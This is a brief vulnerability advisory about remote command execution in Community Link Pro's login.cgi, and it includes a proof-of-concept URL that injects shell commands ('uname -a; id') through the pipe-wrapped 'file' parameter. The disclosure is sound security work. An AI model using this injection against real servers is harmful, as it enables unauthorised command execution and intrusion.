Community Link Pro Login.CGI File Parameter Remote Command Execution Vulnerability

Community Link Pro Login.CGI File Parameter Remote Command Execution Vulnerability

An exploit is not required.

The following proof of concept is available:

http://www.example.com/app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=|uname -a; id|

/data/vulnerabilities/exploits/clogin.pl